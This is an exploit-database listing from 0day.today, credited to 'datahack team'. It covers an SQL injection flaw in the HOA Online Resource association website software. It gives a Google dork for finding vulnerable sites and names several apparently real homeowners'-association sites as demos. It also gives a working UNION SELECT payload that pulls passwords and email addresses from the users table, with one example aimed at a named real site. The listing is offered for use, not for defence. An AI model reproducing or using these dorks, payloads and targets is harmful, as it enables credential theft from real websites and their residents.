[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Association WebDesign SQL Injection Vulnerability

Author
datahack
Risk
[
Security Risk High
]
0day-ID
0day-ID-21585
Category
web applications
Date add
30-11-2013
Platform
php
_                 _                 _     
    | |      _        | |               | |    
  _ | | ____| |_  ____| | _   ____  ____| |  _ 
 / || |/ _  |  _)/ _  | || \ / _  |/ ___) | / )
( (_| ( ( | | |_( ( | | | | ( ( | ( (___| |< ( 
 \____|\_||_|\___)_||_|_| |_|\_||_|\____)_| \_)
                                               

#
# Exploit Title :Association Website Design SQL Injection
#
# Dork : intext:Association Website Design by HOA Online Resource inurl:id=
#
# Exploit Author : datahack team
#
# Date: 2013-11-29
#
# vonder url : www.hoaonlineresource.com
# 
# Home : www.datahack.ir
#
# Security Risk : High
#
# Version : ALL Version
#
#
# Tested on: Linux
#
##############
# Demos:
# 
# http://www.foxhollowhoa.org/news.php?id=6'
# http://www.irislanding.com/news.php?id=6'
# http://www.grovehoa.com/news.php?id=1'
# 
# Exploit:
# 
# http://site/news.php?id=-24[SQL]
#
# poc:  
#
# http://site/news.php?id=-24+UNION+SELECT 1,2,3,pw,emailaddr,6+from users--
#
# Example:
# 
# http://www.wakefieldhoa.com/news.php?id=-24+UNION+SELECT+1,2,3,pw,emailaddr,6+from+users--
#
################
# Greetz to: ALL IRANIAN HACKER
#
# ===IRANIAN HACKER===
#
# contact with me: 
#
# info@datahack.ir
#
##############

#  0day.today [2024-12-24]  #